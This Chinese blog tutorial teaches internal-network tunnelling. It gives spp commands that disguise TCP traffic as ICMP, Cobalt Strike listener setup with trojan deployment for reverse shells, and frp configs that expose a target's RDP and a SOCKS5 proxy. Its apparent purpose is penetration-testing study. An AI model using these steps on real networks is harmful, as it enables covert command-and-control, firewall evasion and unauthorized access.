内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术

于 2024-06-19 15:45:00 发布
阅读量1.1k 收藏 8
点赞数 15
文章标签: 学习 数据库 网安入门 web安全 网络安全 网络安全学习 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84466227/article/details/139790173
版权

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透

内网穿透:解决网络控制上线&网络通讯问题 
隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网) 
代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)

 

spp隧道代理工具

支持的协议:
TCP、UDP、RUDP(可靠 UDP)、RICMP(可靠 ICMP)、RHTTP(可靠 HTTP)、KCP、Quic
支持类型:
正向代理、反向代理、SOCKS5正向代理、SOCKS5反向代理
协议和类型可以自由组合
外部代理协议和内部转发协议可以自由组合

spp工作原理图

spp详解以及下载地址:
https://github.com/esrrhs/spp/tree/0.6

image-20240529205935044

cs上线主机

spp代理通信

本工具使用简单,服务器、客户机各一条命令,就可建立连接。

服务端配置
chmod +x spp  ##添加执行权限
./spp -type server -proto tcp -listen :8888 ##启动spp,并设置为服务端,通信协议为tcp,监控本地的8888端口。

image-20240529211518533

客户端配置
chmod +x spp  ##添加执行权限
./spp -name "sx" -type reverse_proxy_client -server 服务器ip地址:8888 -fromaddr :7777 -toaddr :6666 -proxyproto tcp   ## 设置一个名字(自定义即可),连接服务器的IP地址及端口,将服务器的端口7777映射到本地的端口6666上,设置通信协议为tcp。

image-20240529212247397

服务端可进行查看连接状态

image-20240529212536488

CS配置

CS需要设置两个监听器,一个用于生成木马,一个用于接收反弹shell。

设置CS生成木马的监听器

此监听器IP地址要设置为服务端的IP地址,端口为刚才设置的7777端口,相当于木马执行后,会去访问服务端的7777端,而之前的设置就是将服务端的7777端口信息转发到本地6666端口。

image-20240529213231703

配置CS监听上线的监听器

接受上线主机的监听器(shell)。

image-20240529213337949

生成木马

image-20240529213525160

将木马上传到目标主机当中,执行即可。

image-20240529213619046

成功上线

image-20240529213851077

image-20240529214357108

spp服务端代理状态:

image-20240529214020706

spp隧道搭建

若目标主机的出网TCP被禁止,但是ICMP协议是能够通信的,所以通过SPP将目标主机上的TCP流量伪装为ICMP协议转发给服务端。

服务端配置

这里设置监听的是icmp协议。

./spp -type server -proto ricmp -listen 0.0.0.0  ##这里设置监听ICMP协议,全端口

image-20240529214808484

客户端配置

客户端配置需要在目标主机上进行执行此命令,将本地的TCP伪装为ICMP所以需要转发本地的端口。

spp -name "sx" -type proxy_client -server 服务器IP -fromaddr :7777 -toaddr :6666 -proxyproto tcp -proto ricmp

image-20240602190712858

服务端状态,成功建立隧道

image-20240530191945279

CS配置

CS需要设置两个监听器,一个用于生成木马,一个用于接收反弹shell。

这生成本地的7777端口,因为客户端上已经设置了将7777端口转发了。

image-20240529221856082

生成另一个监听器,监听本地的IP地址的6666端口即可。

image-20240530192149453

监听器状态:

image-20240530192230323

生成木马,执行上线。

选择本地监听器,生成木马即可。

image-20240602190742759

将木马上传到目标机器,执行木马

image-20240530192807213

执行木马,成功上线

image-20240530192444768

spp客户端状态。并抓取流量分析,为icmp流量,伪装成功。

image-20240530192913290

ICMP流量

image-20240530194309039

spp隧道代理工具还可以伪装其他协议,具体详解见spp代理

frp内网穿透

frp 是一种快速反向代理,允许您将位于 NAT 或防火墙后面的本地服务器公开给Internet。它目前支持 TCP和 UDP,以及 HTTP和 HTTPS协议,支持通过域名将请求转发到内部服务。frp 还提供 P2P 连接模式。

项目地址:fatedier/frp

对应下载即可

image-20240602192523847

内网穿透上线

frp配置

服务端配置,修改frps.ini配置文件,简单配置

image-20240602192727135

客户端配置

[common]
server_addr = 服务器ip
server_port = 8080	#连接端口

[nwct]
type = tcp
local_ip = 127.0.0.1
local_port = 9999
remote_port = 8888

image-20240602194819390

服务端开启。客户端开启。观察状态,成功建立连接。

客户端开启,向服务器建立连接。

image-20240602194850298

服务端状态,成功建立连接。

image-20240602194926511

CS上线

客户端开启CS,配置监听器。需要两个监听器,一个生成木马,一个监听反弹shell。

生成木马的监听器配置:

image-20240602195030145

接受shell的监听器配置:

image-20240602202151483

生成木马,上传到目标机器当中,执行,成功上线

image-20240602202216995

上传到目标机,并执行木马

image-20240602195309111

成功上线

image-20240602195355801

配置RDP远程桌面连接内网主机

服务端简单配置不变,开启frp服务

image-20240602200039136

客户端在目标机上执行,配置文件修改

[common]
server_addr = 服务器ip
server_port = 8080

[RDP]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 5555

image-20240602200604485

开启客户端服务,服务端查看状态,成功建立连接

image-20240602200619109

服务端状态

image-20240602200452644

远程桌面连接:

image-20240602200929920

成功连接

image-20240602200805779

socks5代理转发

通过代理转发,实现访问内网web服务

客户端配置:

[socks5]                
type = tcp              
remote_port = 8081
plugin = socks5

image-20240602201205354

客户端执行即可

image-20240602201230346

服务端状态:

image-20240602201254773

通过代理软件或浏览器代理插件配置代理,可访问内网服务

image-20240602201508017

访问内网web服务

image-20240602201728676

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

 1.学习路线图 

 攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

 

 (都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。 

  因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。 

 还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

 最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

 因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取 

  

白帽黑客-晨哥
关注
  • 15
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于SSH隧道的简单内穿透
Vega870092839的博客
01-26 2519
通过SSH隧道实现简单的内穿透
电源技术中的尼古拉•特斯拉和无线电力传输的未来
10-19
当前,实现长距离无线电力传输的技术主要有两种:太空太阳能(Space-Based Solar Power, SSP)和射频识别(Radio-Frequency Identification, RFID)。太空太阳能利用地球轨道上的太阳能电池板收集太阳能,然后通过...
渗透系列:内穿透隧道)学习
闵行小鱼塘
06-30 8674
本文试图学习整理内穿透技术
穿透系列——SSH反向隧道 (最简单的内穿透方案)
weixin_34143774的博客
01-31 236
2019独角兽企业重金招聘Python工程师标准>>> ...
基础-隧道技术、内穿透(SSH隧道、Socket隧道、跨路由扫描)
最新发布
dzqxwzoe的博客
05-20 971
​环境搭建​​​SSH隧道​​​正向连接​​​反向隧道​​​sockets代理​​​MSF端口映射​​​Socket隧道​​​ssocks​​​反向代理​​​1.建立隧道​​​2.开启代理​​​正向代理​​​扫描内​​​MSF跨路由扫描​​​简单收集信息​​​增加路由​​​MSF其他模块​​​推荐阅读​​。
SSH隧道与内穿透
爱吃回锅肉的胖子
04-26 3176
SSH参数解释 -L port:host:hostPort 解释:将本地机器某个端口转发到远端指定机器的指定端口 原理:本地机器分配了一个socket监听port端口,一旦端口上有了连接,该连接就经过安全通道转发出去,同时远程主机和host的hostPort端口建立连接。可以在配置文件中指定端口的转发。只有root才能转发特权端口。 -R port:host:hostPort 解释:将远程主机的某个端口转发到本地端指定机器的指定端口。即反向隧道代理 原理:远程主机上分配了一个socket监听p
CAN-I2S-I2C-SPI-SSP.zip_SSP
09-21
本文将深入探讨五种常见的串行通信协议:CAN(Controller Area Network)、I2S(Inter-IC Sound)、I2C(Inter-Integrated Circuit)、SPI(Serial Peripheral Interface)以及SSP(Serial Synchronous Protocol),...
Oracle Solaris 9 - Sun Enterprise 10000 SSP 3.5 Installation Gui
07-20
Oracle Solaris 9 - Sun Enterprise 10000 SSP 3.5 Installation Guide Oracle Solaris 9 是一款基于 SPARC 架构的操作系统,由 Sun Microsystems 开发和维护。Sun Enterprise 10000 SSP 3.5 是一款大型服务器系统...
SSP技术在采空区探查中的应用
07-15
SSP来源于以地震散射理论为基础的隧道地质超前预报技术TST,与TST不同的是SSP采用地表观测方式,用于煤矿采空区的探测。在复杂地形地质条件下查清了埋深120 m范围内煤层与采空区的分布。这项研究表明地震散射技术可以...
Oracle Solaris 9 - Sun Enterprise 10000 SSP 3.5 User Guide-142
07-20
《Oracle Solaris 9 - Sun Enterprise 10000 SSP 3.5 用户指南》是针对Sun Microsystems公司的高端服务器Sun Enterprise 10000的一款特定存储子系统(SSP)的详细操作手册。该指南是针对Oracle Solaris 9操作系统...
matlab的双曲线代码-SSPTools:SSP工具
05-28
matlab的双曲线代码SSP工具# SSPTools是一个MATLAB工具箱,用于研究数值方法的强稳定性(SSP)性质,这些数值方法近似于保守的双曲型偏微分方程的解。 有关SSP方法和当前研究项目的更多信息,请访问以下址: 请签...
固件-SSP-SINAMICS-DCM-V1-5-SP1-链接地址.txt
04-17
固件_SSP_SINAMICS_DCM_V1_5_SP1_链接地址
ssp-dccy-1.34.0.apk.1.1.1.1.1.1
10-13
ssp-dccy-1.34.0.apk.1.1.1.1.1.1
东方SSP-1调速器说明书
04-18
东方SSP-1调速器说明书,操作说明和工作原理都在里哦,
matlab编写fft函数代码-ssp-matlab:ssp-matlab
06-17
在MATLAB中,快速傅里叶变换(FFT)是一种广泛使用的数字信号处理工具,用于将时域信号转换到频域,以便分析信号的频率成分。MATLAB内置的`fft`函数提供了快速且高效的FFT计算,但有时用户可能出于特定需求或教学...
渗透隧道
nigo134的博客
05-14 1218
安全实验室 | 利用EarthWorm实现内穿透 相信我们在内渗透的过程中总会遇到各种各样配置复杂的络区域,有的能通DMZ、有的能互联、有的不能通外等等。有时我们好不容易拿下了一台机器的权限,却被限制在他的络分区中无法深入,彻夜难眠。少年不要灰心,不妨我们一起学习内穿透的姿势,分分钟搞穿内不是梦! 01、内穿透原理1)什么是内穿透 专业点来讲内穿透就是利用各种隧道技术,以络防火墙允许的协议,绕过络防火墙的封锁,实现访问被封锁的目标络。通俗点来说,就是电脑A和电脑B分别在两
隐藏通信隧道技术:内穿透工具 nps
有勇气的牛排博客
02-09 7467
1 nps工具介绍 NPS工具是一款使用go语言编写的轻量级、功能强大的内穿透工具。支持TCP、UDP流量转发,支持内HTTP、SOCKS5代理,同时支持snappy压缩(节省带宽和流量)、站点保护、加密传输、多路复用、header修改等。同时还支持web图形化管理。该工具使用简单,相比于FRP,NPS是图形化界面,因此配置更加简单。 nps同frp工作原理相似。 官方文档: https://ehang-io.github.io/nps/#/api https://ehang-io.github.io/
【内安全-隧道搭建】内穿透_Frp上线、测试
02-04 5827
【内穿透-隧道搭建】Frp工具准备、上线、测试
李超深度解析:内渗透技巧与ActiveDirectory攻防
《ISC-渗透 -最终版》提供了深度的内渗透技术和策略,旨在帮助安全研究人员和渗透测试人员提高在AD环境中的渗透能力,同时也提醒企业在管理和保护其AD系统时需要注意的风险和防御措施。阅读这份文档,读者将能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值